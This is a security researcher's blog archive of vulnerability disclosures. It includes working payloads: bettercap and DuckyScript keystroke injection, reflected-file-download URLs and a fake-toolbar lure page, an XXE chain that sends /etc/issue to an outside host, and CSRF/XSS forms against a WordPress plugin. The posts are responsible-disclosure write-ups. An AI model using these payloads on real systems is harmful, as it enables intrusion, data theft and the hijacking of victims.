Advisories

18/03/19 Advisories , Hardware # bettercap, duckyscript, hid, logitech m185, mousejack

Popular wireless Logitech mouse vulnerable to keystroke injection

One of the things that keeps me on the security path is the opportunity to learn new things each day.
After seing the new update on Bettercap – which supports HID (Human Interface Device) – I decided to read about it – specially on MouseJack keystroke injection attacks.

I went throught the affected devices list and didn’t have any on my own to test it. BUT I had a Logitech M185 wireless mouse which is very popular because… it’s cheap comparing to other models.

I grabbed the CrazyRadio dongle – which was waiting for better usage on my lab – and put it into action.

I opened Bettercap and turn on the HID recon:

sudo bettercap -eval="net.recon off;hid.recon on"

After a while I detected my Logitech M185 and also other stuff:

Just to make sure it was really my device, I did a simple HID.sniff ADDR and pressed a few buttons. Don’t want to pop shells anywhere 🙂

Next, I created a simple DuckyScript to show the Windows calcultator on the desktop:

GUI r
DELAY 200
STRING calc
DELAY 200
ENTER

What we have so far:

Bettercap running with HID module on
Detected my Logitech M185 2.4Ghz mouse
Created the DuckyScript to use (ducky.txt)

The only thing missing is to inject our payload and see what happens:

hid.inject ADDR PT ducky.txt

You can see the end result of this proof-of-concept video – https://www.youtube.com/watch?v=TdPRYWkYarM

Don’t want to be a spoiler but… yeh it’s vulnerable 🙂

no responses

13/09/17 Advisories , Interesting Readings , News # checkmarx, golang, ip cam, subdomain takeover

Checkmarx Security Research Team latest work

CSRT latest work and news:

More to come really soon… 🙂 Having fun hacking!

no responses

24/10/16 Advisories , Bug Bounty

OLX and Adobe full-disclosures on HackerOne

OLX Stored XSS
https://hackerone.com/reports/152069

Adobe Reflected XSS
https://hackerone.com/reports/50389

I asked for full-disclosure of this reports so other users can learn something from it.
The OLX security report was also mentioned on a portuguese media site- Future Behind. If you know portuguese language feel free to read it.

no responses

05/08/16 Advisories , Bug Bounty , Interesting Readings

Latest work done

Just to give a small update on my work… I’ve been more active on my Twitter account so follow me to get the latest updates on my security work 🙂

Also here are some work I’ve done:

(Cobalt.io) – The Top 10 Vulnerabilities used by David Sopas to reach #1 at Cobalt
(Char49) – Flash XSS on typewrite_header.swf
(Char49) – Char49 helps Microsoft fix a Reflected File Download
(Checkmarx) – When Booking Your Flight Become Dangerous

Regarding conferences I’ve been on Join 2016 @Braga presenting the talk “Hacking from Black to White”.

no responses

24/03/16 Advisories , Bug Bounty # advisories, full disclosure, security researcher, uber, vendor

Hey vendors, researchers are here to help

Yesterday I was exchanging some messages on Twitter – specially with Kymberlee Price (from BugCrowd) – about the relationship between vendors and security researchers when disclosing a security issue.

In my experience I know what’s the feeling of trying to help a vendor and they ignore you or in some extreme cases even “inviting” you to stop what you are doing on their website. Vendors need to understand that most security researchers are here to help – working in the same side against bad guys. The problem in this connection is trust.

Vendors don’t trust researchers.
Researchers are loosing trust on vendors.
We need to fix it.

I had a bad experience with lots of big IT companies. Specially the ones I usually use on their products. I don’t go around companies and test vulnerabilities like crazy. I just like to feel more secure when using some web application.

In my opinion these are the main issues:

Lack of information on where to report a security issue
Security report gets lost in their support system
The vendor don’t reply back or just say it will be forward to the developing team
Vendor don’t update the security status
Researcher could even get threatened about the report

But not all vendors are like that. I already tried different approaches who seemed to work.

Email the vendor giving them a small presentation telling who you are and ask for the right person to deal with a security threat
After you got the email, try to schedule a online chat or even Skype meeting to establish some kind of trust between both parts.
Talk about that you found, the consequences and a possible solution.

If you manage to do all this I bet the treatment in the future will be better for you and for future researchers who try to contact them.
You as a researcher have the responsibility to prepare the path and improve the communication between vendors.
Don’t give them hell! Give them trust!

Even on bug bounty programs you have issues. Vendors who reply to your report in 1 year without even worrying about getting the researcher a feedback like:

We’re working on it. It will take some time, maybe weeks or months…

Even yesterday – Sean Mealia wrote on his Twitter that Uber changed their in-scope program after he sent a couple of security issues.
It also happened to me in a private program for a popular online newspaper. I reported a security issue where a attacker could steal users information and they categorized as “Informative” and fixed it in a couple of days.
This type of situations are not good for the business. Vendors must respect the researchers and visa-versa.

Well this are my thoughts about this, feel free to share yours in the comments section.

For those who are interested about this topic I recommend watching the video of Kymberlee Price at Kaspersky Security Analyst Summit 2016.

no responses

21/01/16 Advisories # google, google finance, rfd

Google Finance Reflected File Download

Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already do this for us.

When I noticed this request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=?

Which returned the following information:

// [
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]

I wondered if that callback parameter could be manipulated. So I injected “calc” on the request:

http://www.google.com/finance/info?q=ELI:ALTR&callback=calc

Which returned the following information:

//
calc([
{
"id": "703655"
,"t" : "ALTR"
,"e" : "ELI"
,"l" : "4.71"
,"l_fix" : "4.71"
,"l_cur" : "€4.71"
,"s": "0"
,"ltt":"5:35PM GMT+1"
,"lt" : "Dec 15, 5:35PM GMT+1"
,"lt_dts" : "2015-12-15T17:35:40Z"
,"c" : "+0.31"
,"c_fix" : "0.31"
,"cp" : "7.14"
,"cp_fix" : "7.14"
,"ccol" : "chg"
,"pcls_fix" : "4.396"
}
]
);

Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc

Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.

I tried successfully with the following browsers:

Firefox latest version
Opera latest version
Internet Explorer 8 and 9

What are the limitations?

I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments.

Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]

http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logoffs the authenticated user]

Possible attack scenario:

Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
Victim downloads the file and execute it.
After execution of the batch file it will logoff the victim from the operating system.

I made a small video that illustrates my proof-of-concept:

Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.

no responses

19/01/16 Advisories # acknowledgments, bing, microsoft, rfd

Bing Reflected File Download

When using Bing online translator I noticed a XHR request on my browser that caught my attention:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=jQuery111207287312552798539_1444907172498&market=en&word=test&_=1444907172499

On which reflected on the screen:

jQuery111207287312552798539_1444907172498();

As a security researcher I always try to find different ways to bypass security specially related to Reflected File Download. So I tried to inject a RFD vector on the parameter “oncomplete”:

http://www.bing.com/translator/LandingPage/GetDefinition?oncomplete=start%20chrome%20davidsopas.com/poc/malware.htm

On which reflected on the screen:

start chrome davidsopas.com/poc/malware.htm();

Using the HTML5 download attribute I was able to send a security report to Microsoft which they fixed within a month.

With this report I was listed on the Security Researcher Acknowledgments for Microsoft Online Services for the forth time.

no responses

11/01/16 Advisories # gps, gpx, wikiloc, xxe

Wikiloc XXE vulnerability

For those who still don’t know Wikiloc:

Wikiloc is a place to discover and share the best outdoor trails for hiking, cycling and many other activities.
We are 1,725,606 members exploring and sharing 3,936,841 outdoor trails and 6,503,289 photos.

I was searching for a cool track to ride my bike [yes I love #cycling] and I created an account on Wikiloc.
I already known the site but never registered. Such a cool site in my opinion.

As a security researcher I always take a look on the web applications requests and transactions and after uploading a XML I remember to test Wikiloc for a XXE vulnerability. This is a very dangerous type of vulnerability and could be used by malicious users to compromise the server.

So let me explain what I did:

First I downloaded a .gpx file from Wikiloc to see the structure of the XML.

I injected the following line on top of the file:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>;

And called the entity on the track name:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://www.davidsopas.com/XXE" > ]>
<gpx
 version="1.0"
 creator="GPSBabel - http://www.gpsbabel.org"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns="http://www.topografix.com/GPX/1/0"
 xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
 <name>&xxe;</name>
<trkseg>
<trkpt lat="40.737758000" lon="-8.093361000">
 <ele>178.000000</ele>
 <time>2009-01-10T14:18:10Z</time>
(...)

I uploaded the .gpx file and voilá! Got a request made by Wikiloc server to my own:

GET 144.76.194.66 /XXE/ 10/29/15 1:02 PM Java/1.7.0_51

To make sure that was your server I resolved the IP which was master.wikiloc.com. I also know what version of Java they were are using – 1.7.0_51.

But to show how dangerous it can be I wanted to test for external DTD and request a file hosted on Wikiloc server – /etc/issue [which will return the operating system used].

So I modified other .gpx file with the following code:

<!DOCTYPE roottag [ 
 <!ENTITY % file SYSTEM "file:///etc/issue">
 <!ENTITY % dtd SYSTEM "http://www.davidsopas.com/poc/xxe.dtd">
%dtd;]>
<gpx
 version="1.0"
 creator="GPSBabel - http://www.gpsbabel.org"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xmlns="http://www.topografix.com/GPX/1/0"
 xsi:schemaLocation="http://www.topografix.com/GPX/1/1 http://www.topografix.com/GPX/1/1/gpx.xsd">
<time>2015-10-29T12:53:09Z</time>
<bounds minlat="40.734267000" minlon="-8.265529000" maxlat="40.881475000" maxlon="-8.037170000"/>
<trk>
 <name>&send;</name>
(...)

xxe.dtd has the following XML code:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://www.davidsopas.com/XXE?%file;'>">
%all;

I uploaded the new .gpx file and got the following GET request on my server:

144.76.194.66 GET /XXE/?Debian 10/29/15 1:12 PM Java/1.7.0_51

With XXE you can do a variaty of things. A malicious user could upload files, check source-code, launch DDoS attacks, you name it.

This issue its already fixed by Wikiloc. They were very fast and concerned about this. It’s shows that they care about security.
Also they provided me with a token of appreciation (they know exactly how to please a cyclist 🙂 ) and also put my name on their contributors list.

wikiloc_gift

Keep up the good work Wikiloc!

no responses

23/12/15 Advisories # cobalt.io, list-manage.com, mailchimp, rfd

MailChimp Reflected File Download

When auditing a MailChimp client for Cobalt.io I noticed that this company suffers from a Reflected File Download vulnerability that could be exploited only by using HTML5 download attribute.

Let’s take a look into the original GET request:

http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&amp;id=91d16923d8&amp;c=?

This request is part of the subscription to a email campaign at MailChimp.
Checking the URL you can see “c” parameter is nothing more than the callback:

?({“result”:”error”,”msg”:”Blank email address”})

Putting my RFD vector on the callback:

http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&amp;id=91d16923d8&amp;c=start%20chrome%20davidsopas.com/poc/malware.htm||

I get the following reflected:

start chrome davidsopas.com/poc/malware.htm||({“result”:”error”,”msg”:”Blank email address”})

Because list-manage.com is not URL permissive I needed to use a external page to create my proof-of-concept:

<div align="center">
<a href="http://[mailchimp_client].us5.list-manage.com/subscribe/post-json?u=41352a29fd45def27e8aea4cd&id=91d16923d8&c=start%20chrome%20davidsopas.com/poc/malware.htm||" download="setup.bat" onclick="return false;"><img src="https://hfweb-assets.s3.amazonaws.com/integrations/mailchimp.png" border="0" /></a>
<h1>Install MailChimp toolbar to improve your email send score!</h1>
<p><i>(Use "Save Link As" to download the file)</i></p>
</div>

So a possible attack scenario would be:

Victim visits a page with a specially crafted page – like my PoC
Victim downloads the file using Save Link As (which comes from a trusted domain – list-manage.com)
Victim gets hijacked

Because the download comes from a trusted domain, victims are tricked to execute files that are not suppose to.
This works perfectly on latest versions of Google Chrome and Opera.

MailChimp considered this issue to be a social engineering attack so they’ll not fix it.
In my opinion this is something that this company could prevent from happening just by adding a header to their request. In the end it’s a MailChimp decision not mine.

When I requested the disclosure of this report MailChimp replied:

We neither condone nor prohibit you from adding this to your security blog.

Hope it helps other companies and security researchers to better understand RFD…

no responses

18/12/15 Advisories # csrf, mTouch Quiz, persistent xss, plugin, Wordpress, xss

Multiple vulns on mTouch Quiz WordPress plugin

Plugin link: https://wordpress.org/plugins/mtouch-quiz/
Active Installs: 5,000+
Version tested: 3.1.2
CVE Reference: Waiting

mTouch Quiz lets you add quizzes to your site. This plugin was designed with learning, touch friendliness and versatility in mind.

I found multiple vulnerabilities on WordPress plugin – mTouch Quiz <= 3.1.2.

#1 Reflected XSS on Quiz Manage
“quiz” parameter wasn’t properly sanitized therefore you could inject a XSS vector on the URL and get reflected on the screen.

Proof-of-concept:

/wp-admin/edit.php?page=mtouch-quiz%2Fquiz_form.php&quiz=1"><h1>XSS</h1>&action=edit

Looking at the end of the page you could see the injected HTML.

Reflected source-code:

<input type="hidden" name="quiz" value="1\"><h1>XSS</h1>

#2 CSRF on General Options
On plugin general options lacked a security token (like wp_nonce) to prevent CSRF attacks.
Take this form from example:

<form action="https://victims_website/wp-admin/options-general.php?page=mtouchquiz" name="dsopas" method="POST">
<input type="hidden" name="mtq_hidden" value="Y" />
<input type="hidden" name="left_delimiter" value="\(\displaystyle{" />
<input type="hidden" name="right_delimiter" value="}\)" />
<input type="hidden" name="showalerts" value="1" />
<input type="hidden" name="show_support" value="1" />
</form> <script> document.dsopas.submit(); </script>

If a authenticated admin visited this page with this HTML code his settings will be changed.

#3 Add a question using CSRF and get a persistent XSS

This was a critical issue. If a authenticated admin visited a page with this HTML he would add a question with a XSS vector (in my proof-of-concept would prompt a text).
A malicious user could use this to spread a malware, admin takeover, etc…

<form action="https://victims_website/wp-admin/edit.php?page=mtouch-quiz/question.php&quiz=1" name="dsopas" method="POST">
<input type="hidden" name="content" value='<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0PnByb21wdCgiWFNTIik7PC9zY3JpcHQ+PC9zdmc+" type="image/svg+xml" width="300" height="150"></embed>' />
<input type="hidden" name="correct_answer[]" value="1" />
<input type="hidden" name="answer[]" value="test1" />
<input type="hidden" name="hint[]" value="hint1" />
<input type="hidden" name="enclose_latex[]" value="2" />
<input type="hidden" name="answer[]" value="test2" />
<input type="hidden" name="enclose_latex[]" value="2" />
<input type="hidden" name="hint[]" value="hint2" />
<input type="hidden" name="answer[]" value="" />
<input type="hidden" name="hint[]" value="" />
<input type="hidden" name="answer[]" value="" />
<input type="hidden" name="hint[]" value="" />
<input type="hidden" name="answer[]" value="" />
<input type="hidden" name="hint[]" value="" />
<input type="hidden" name="explanation" value="<h1>xss</h1>" />
<input type="hidden" name="point_value" value="100" />
<input type="hidden" name="quiz" value="1" />
<input type="hidden" name="question" value="" />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="action" value="new" />
<input type="hidden" name="submit" value="Save" />
</form> <script> document.dsopas.submit(); </script>

#4 Quiz Name XSS

This was a minor issue but if other user level had access to this, he could change the quiz name to a XSS vector and get a persistent XSS.

Solution:
Vendor in a matter of few weeks launched a patched version – 3.1.3. Also he was kind enough to put my name on the changelog.

Corrected several potential security vulnerabilities. Thanks to David Sopas @dsopas for very kindly pointing them out and suggesting effective solutions.

no responses

1 2 3 Next

Popular wireless Logitech mouse vulnerable to keystroke injection

Checkmarx Security Research Team latest work

OLX and Adobe full-disclosures on HackerOne

Latest work done

Hey vendors, researchers are here to help

Google Finance Reflected File Download

Bing Reflected File Download

Wikiloc XXE vulnerability

Multiple vulns on mTouch Quiz WordPress plugin

Recent Posts

Recent Comments

Archives

Categories